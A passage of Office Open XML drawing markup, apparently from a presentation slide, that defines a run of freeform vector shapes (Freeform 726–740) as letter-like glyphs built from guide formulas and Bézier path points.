                <a:gd name="T4" fmla="*/ 200 w 212"/>
                <a:gd name="T5" fmla="*/ 77 h 280"/>
                <a:gd name="T6" fmla="*/ 180 w 212"/>
                <a:gd name="T7" fmla="*/ 62 h 280"/>
                <a:gd name="T8" fmla="*/ 98 w 212"/>
                <a:gd name="T9" fmla="*/ 62 h 280"/>
                <a:gd name="T10" fmla="*/ 98 w 212"/>
                <a:gd name="T11" fmla="*/ 21 h 280"/>
                <a:gd name="T12" fmla="*/ 81 w 212"/>
                <a:gd name="T13" fmla="*/ 0 h 280"/>
                <a:gd name="T14" fmla="*/ 64 w 212"/>
                <a:gd name="T15" fmla="*/ 21 h 280"/>
                <a:gd name="T16" fmla="*/ 64 w 212"/>
                <a:gd name="T17" fmla="*/ 62 h 280"/>
                <a:gd name="T18" fmla="*/ 21 w 212"/>
                <a:gd name="T19" fmla="*/ 62 h 280"/>
                <a:gd name="T20" fmla="*/ 0 w 212"/>
                <a:gd name="T21" fmla="*/ 77 h 280"/>
                <a:gd name="T22" fmla="*/ 20 w 212"/>
                <a:gd name="T23" fmla="*/ 92 h 280"/>
                <a:gd name="T24" fmla="*/ 64 w 212"/>
                <a:gd name="T25" fmla="*/ 92 h 280"/>
                <a:gd name="T26" fmla="*/ 64 w 212"/>
                <a:gd name="T27" fmla="*/ 214 h 280"/>
                <a:gd name="T28" fmla="*/ 134 w 212"/>
                <a:gd name="T29" fmla="*/ 280 h 280"/>
                <a:gd name="T30" fmla="*/ 212 w 212"/>
                <a:gd name="T31" fmla="*/ 214 h 280"/>
                <a:gd name="T32" fmla="*/ 194 w 212"/>
                <a:gd name="T33" fmla="*/ 194 h 280"/>
                <a:gd name="T34" fmla="*/ 177 w 212"/>
                <a:gd name="T35" fmla="*/ 213 h 280"/>
                <a:gd name="T36" fmla="*/ 137 w 212"/>
                <a:gd name="T37" fmla="*/ 249 h 280"/>
                <a:gd name="T38" fmla="*/ 98 w 212"/>
                <a:gd name="T39" fmla="*/ 211 h 280"/>
                <a:gd name="T40" fmla="*/ 98 w 212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80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1" y="62"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="62"/>
                    <a:pt x="0" y="62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2" y="258"/>
                    <a:pt x="212" y="214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="205"/>
                    <a:pt x="212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1" name="Freeform 726">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62D7BCCC-D4C5-470F-9E88-3ECC8FC06F5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95513" y="2635250"/>
              <a:ext cx="107950" cy="144463"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 181 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 217 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 289 h 308"/>
                <a:gd name="T8" fmla="*/ 218 w 237"/>
                <a:gd name="T9" fmla="*/ 274 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 274 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 20 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 139 w 237"/>
                <a:gd name="T17" fmla="*/ 0 h 308"/>
                <a:gd name="T18" fmla="*/ 118 w 237"/>
                <a:gd name="T19" fmla="*/ 15 h 308"/>
                <a:gd name="T20" fmla="*/ 138 w 237"/>
                <a:gd name="T21" fmla="*/ 30 h 308"/>
                <a:gd name="T22" fmla="*/ 161 w 237"/>
                <a:gd name="T23" fmla="*/ 30 h 308"/>
                <a:gd name="T24" fmla="*/ 161 w 237"/>
                <a:gd name="T25" fmla="*/ 109 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 197 h 308"/>
                <a:gd name="T30" fmla="*/ 98 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 161 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 161 w 237"/>
                <a:gd name="T35" fmla="*/ 172 h 308"/>
                <a:gd name="T36" fmla="*/ 161 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 100 w 237"/>
                <a:gd name="T39" fmla="*/ 277 h 308"/>
                <a:gd name="T40" fmla="*/ 35 w 237"/>
                <a:gd name="T41" fmla="*/ 197 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 117 h 308"/>
                <a:gd name="T44" fmla="*/ 161 w 237"/>
                <a:gd name="T45" fmla="*/ 17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1" y="280"/>
                  </a:move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ubicBezTo>
                    <a:pt x="237" y="274"/>
                    <a:pt x="224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lose/>
                  <a:moveTo>
                    <a:pt x="161" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="277"/>
                    <a:pt x="35" y="242"/>
                    <a:pt x="35" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="150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2" name="Freeform 727">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9038FC8-87EB-4AD7-BFFF-B63244DAC927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325688" y="2635250"/>
              <a:ext cx="85725" cy="142875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1 h 306"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 91 h 306"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 106 h 306"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 306"/>
                <a:gd name="T10" fmla="*/ 80 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 306"/>
                <a:gd name="T12" fmla="*/ 80 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 306"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 306"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 291 h 306"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 306 h 306"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 306 h 306"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 291 h 306"/>
                <a:gd name="T24" fmla="*/ 167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6"/>
                    <a:pt x="112" y="91"/>
                    <a:pt x="95" y="91"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="91"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="91"/>
                    <a:pt x="4" y="91"/>
                    <a:pt x="4" y="106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67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3" name="Freeform 728">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3350997D-2424-4AEE-B973-4575CE4C8030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439988" y="2674938"/>
              <a:ext cx="93663" cy="104775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8 h 223"/>
                <a:gd name="T14" fmla="*/ 102 w 204"/>
                <a:gd name="T15" fmla="*/ 31 h 223"/>
                <a:gd name="T16" fmla="*/ 170 w 204"/>
                <a:gd name="T17" fmla="*/ 108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8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4" name="Freeform 729">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63356732-CF29-49F3-A82E-9B06F4965FB8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593975" y="2749550"/>
              <a:ext cx="28575" cy="28575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 63"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 63"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 63"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 63"/>
                <a:gd name="T8" fmla="*/ 62 w 62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62" y="32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49" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62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5" name="Freeform 730">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3597C134-B7A5-4DC0-9021-82F8FDB3AF0A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670175" y="2635250"/>
              <a:ext cx="114300" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 250"/>
                <a:gd name="T1" fmla="*/ 158 h 305"/>
                <a:gd name="T2" fmla="*/ 143 w 250"/>
                <a:gd name="T3" fmla="*/ 87 h 305"/>
                <a:gd name="T4" fmla="*/ 77 w 250"/>
                <a:gd name="T5" fmla="*/ 113 h 305"/>
                <a:gd name="T6" fmla="*/ 77 w 250"/>
                <a:gd name="T7" fmla="*/ 20 h 305"/>
                <a:gd name="T8" fmla="*/ 57 w 250"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 21 w 250"/>
                <a:gd name="T11" fmla="*/ 0 h 305"/>
                <a:gd name="T12" fmla="*/ 0 w 250"/>
                <a:gd name="T13" fmla="*/ 15 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 250"/>
                <a:gd name="T15" fmla="*/ 30 h 305"/>
                <a:gd name="T16" fmla="*/ 43 w 250"/>
                <a:gd name="T17" fmla="*/ 30 h 305"/>
                <a:gd name="T18" fmla="*/ 43 w 250"/>
                <a:gd name="T19" fmla="*/ 274 h 305"/>
                <a:gd name="T20" fmla="*/ 21 w 250"/>
                <a:gd name="T21" fmla="*/ 274 h 305"/>
                <a:gd name="T22" fmla="*/ 0 w 250"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 20 w 250"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 100 w 250"/>
                <a:gd name="T27" fmla="*/ 305 h 305"/>
                <a:gd name="T28" fmla="*/ 120 w 250"/>
                <a:gd name="T29" fmla="*/ 290 h 305"/>
                <a:gd name="T30" fmla="*/ 99 w 250"/>
                <a:gd name="T31" fmla="*/ 274 h 305"/>
                <a:gd name="T32" fmla="*/ 77 w 250"/>
                <a:gd name="T33" fmla="*/ 274 h 305"/>
                <a:gd name="T34" fmla="*/ 77 w 250"/>
                <a:gd name="T35" fmla="*/ 186 h 305"/>
                <a:gd name="T36" fmla="*/ 140 w 250"/>
                <a:gd name="T37" fmla="*/ 117 h 305"/>
                <a:gd name="T38" fmla="*/ 173 w 250"/>
                <a:gd name="T39" fmla="*/ 161 h 305"/>
                <a:gd name="T40" fmla="*/ 173 w 250"/>
                <a:gd name="T41" fmla="*/ 274 h 305"/>
                <a:gd name="T42" fmla="*/ 153 w 250"/>
                <a:gd name="T43" fmla="*/ 274 h 305"/>
                <a:gd name="T44" fmla="*/ 133 w 250"/>
                <a:gd name="T45" fmla="*/ 290 h 305"/>
                <a:gd name="T46" fmla="*/ 153 w 250"/>
                <a:gd name="T47" fmla="*/ 305 h 305"/>
                <a:gd name="T48" fmla="*/ 230 w 250"/>
                <a:gd name="T49" fmla="*/ 305 h 305"/>
                <a:gd name="T50" fmla="*/ 250 w 250"/>
                <a:gd name="T51" fmla="*/ 290 h 305"/>
                <a:gd name="T52" fmla="*/ 229 w 250"/>
                <a:gd name="T53" fmla="*/ 274 h 305"/>
                <a:gd name="T54" fmla="*/ 207 w 250"/>
                <a:gd name="T55" fmla="*/ 274 h 305"/>
                <a:gd name="T56" fmla="*/ 207 w 250"/>
                <a:gd name="T57" fmla="*/ 15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07" y="158"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="108"/>
                    <a:pt x="182" y="87"/>
                    <a:pt x="143" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="87"/>
                    <a:pt x="87" y="104"/>
                    <a:pt x="77" y="113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00" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="305"/>
                    <a:pt x="120" y="305"/>
                    <a:pt x="120" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="274"/>
                    <a:pt x="107" y="274"/>
                    <a:pt x="99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40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4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="274"/>
                    <a:pt x="133" y="274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30" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="305"/>
                    <a:pt x="250" y="305"/>
                    <a:pt x="250" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250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6" name="Freeform 731">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{799B4E56-7D95-4A27-9DBA-F9167A857198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806700" y="2651125"/>
              <a:ext cx="139700" cy="136525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 295 w 305"/>
                <a:gd name="T1" fmla="*/ 156 h 290"/>
                <a:gd name="T2" fmla="*/ 305 w 305"/>
                <a:gd name="T3" fmla="*/ 145 h 290"/>
                <a:gd name="T4" fmla="*/ 295 w 305"/>
                <a:gd name="T5" fmla="*/ 134 h 290"/>
                <a:gd name="T6" fmla="*/ 19 w 305"/>
                <a:gd name="T7" fmla="*/ 4 h 290"/>
                <a:gd name="T8" fmla="*/ 10 w 305"/>
                <a:gd name="T9" fmla="*/ 0 h 290"/>
                <a:gd name="T10" fmla="*/ 0 w 305"/>
                <a:gd name="T11" fmla="*/ 10 h 290"/>
                <a:gd name="T12" fmla="*/ 10 w 305"/>
                <a:gd name="T13" fmla="*/ 21 h 290"/>
                <a:gd name="T14" fmla="*/ 271 w 305"/>
                <a:gd name="T15" fmla="*/ 145 h 290"/>
                <a:gd name="T16" fmla="*/ 10 w 305"/>
                <a:gd name="T17" fmla="*/ 269 h 290"/>
                <a:gd name="T18" fmla="*/ 0 w 305"/>
                <a:gd name="T19" fmla="*/ 280 h 290"/>
                <a:gd name="T20" fmla="*/ 10 w 305"/>
                <a:gd name="T21" fmla="*/ 290 h 290"/>
                <a:gd name="T22" fmla="*/ 19 w 305"/>
                <a:gd name="T23" fmla="*/ 286 h 290"/>
                <a:gd name="T24" fmla="*/ 295 w 305"/>
                <a:gd name="T25" fmla="*/ 15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90">
                  <a:moveTo>
                    <a:pt x="295" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="153"/>
                    <a:pt x="305" y="151"/>
                    <a:pt x="305" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="305" y="139"/>
                    <a:pt x="301" y="136"/>
                    <a:pt x="295" y="134"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19" y="4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3" y="18"/>
                    <a:pt x="10" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="271" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="269"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="272"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="285"/>
                    <a:pt x="5" y="290"/>
                    <a:pt x="10" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="290"/>
                    <a:pt x="13" y="290"/>
                    <a:pt x="19" y="286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="295" y="1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7" name="Freeform 732">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C94789E8-BCC3-40E8-A034-ACFF5812F367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04850" y="3195638"/>
              <a:ext cx="87313" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111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1 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81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1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8" name="Freeform 733">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E21F6E-BBAC-48B6-A6D6-D44855CC6AE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809625" y="3236913"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 27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19 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34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19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8 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75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8 h 218"/>
                <a:gd name="T48" fmla="*/ 206 w 249"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 206 w 249"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 249"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 76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7"/>
                  </a:move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19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9" name="Freeform 734">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E76DF9BD-B525-4BD4-B2ED-9A53E2123B5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933450" y="3209925"/>
              <a:ext cx="96838" cy="130175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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92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3 w 211"/>
                <a:gd name="T33" fmla="*/ 194 h 279"/>
                <a:gd name="T34" fmla="*/ 177 w 211"/>
                <a:gd name="T35" fmla="*/ 213 h 279"/>
                <a:gd name="T36" fmla="*/ 136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199" y="92"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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19" y="92"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="63" y="92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3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0" name="Freeform 735">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA1CD48-F89D-4AE8-B9CF-E4BEBF19C5DC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169988" y="3236913"/>
              <a:ext cx="109538" cy="153988"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 237"/>
                <a:gd name="T1" fmla="*/ 87 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 31 h 329"/>
                <a:gd name="T4" fmla="*/ 203 w 237"/>
                <a:gd name="T5" fmla="*/ 111 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 77 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 77 w 237"/>
                <a:gd name="T11" fmla="*/ 87 h 329"/>
                <a:gd name="T12" fmla="*/ 77 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 135 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 111 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 77 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 57 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 21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9 h 329"/>
                <a:gd name="T34" fmla="*/ 21 w 237"/>
                <a:gd name="T35" fmla="*/ 299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9 w 237"/>
                <a:gd name="T45" fmla="*/ 299 h 329"/>
                <a:gd name="T46" fmla="*/ 77 w 237"/>
                <a:gd name="T47" fmla="*/ 299 h 329"/>
                <a:gd name="T48" fmla="*/ 77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7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1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7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7" y="174"/>
                    <a:pt x="237" y="111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1" y="299"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13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7" y="299"/>
                    <a:pt x="99" y="299"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="299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1" name="Freeform 736">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6364814D-3720-4E58-885B-15E146A4CAA1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295400" y="3236913"/>
              <a:ext cx="103188" cy="101600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1 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 226"/>
                <a:gd name="T5" fmla="*/ 53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1 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 226"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 226"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20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8 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 188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6" y="53"/>
                    <a:pt x="226" y="45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2" name="Freeform 737">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2104AF6A-1293-4082-8FD0-F55801C1216F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425575" y="3195638"/>
              <a:ext cx="87313" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111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1 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81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5 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111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3" name="Freeform 738">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9460A6E1-9902-4A03-BC2D-96A94C57A38A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531938" y="3236913"/>
              <a:ext cx="114300" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 249"/>
                <a:gd name="T1" fmla="*/ 27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20 w 249"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 42 w 249"/>
                <a:gd name="T11" fmla="*/ 34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8 h 218"/>
                <a:gd name="T26" fmla="*/ 76 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 76 w 249"/>
                <a:gd name="T29" fmla="*/ 100 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 249"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 172 w 249"/>
                <a:gd name="T33" fmla="*/ 75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6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7"/>
                  </a:move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6" y="188"/>
                    <a:pt x="228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4" name="Freeform 739">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5699561C-B7CC-429E-8F78-58FE3AA35EF8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654175" y="3209925"/>
              <a:ext cx="96838" cy="130175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200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20 w 211"/>
                <a:gd name="T23" fmla="*/ 92 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 92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3" y="92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5" name="Freeform 740">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40853E61-7039-4A85-8B33-1CD412BBC495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778000" y="3195638"/>
              <a:ext cx="90488" cy="142875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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 51 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 29 h 307"/>
                <a:gd name="T18" fmla="*/ 149 w 197"/>
                <a:gd name="T19" fmla="*/ 0 h 307"/>
                <a:gd name="T20" fmla="*/ 70 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 307"/>
                <a:gd name="T22" fmla="*/ 70 w 197"/>
                <a:gd name="T23" fmla="*/ 92 h 307"/>
                <a:gd name="T24" fmla="*/ 21 w 197"/>
                <a:gd name="T25" fmla="*/ 92 h 307"/>
                <a:gd name="T26" fmla="*/ 0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 307"/>
                <a:gd name="T30" fmla="*/ 70 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 307"/>
                <a:gd name="T32" fmla="*/ 70 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 307"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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1"/>
                    <a:pt x="175" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="51"/>
                    <a:pt x="197" y="43"/>
                    <a:pt x="197" y="29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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="92"/>
                    <a:pt x="0" y="92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0" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70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0" y="307"/>
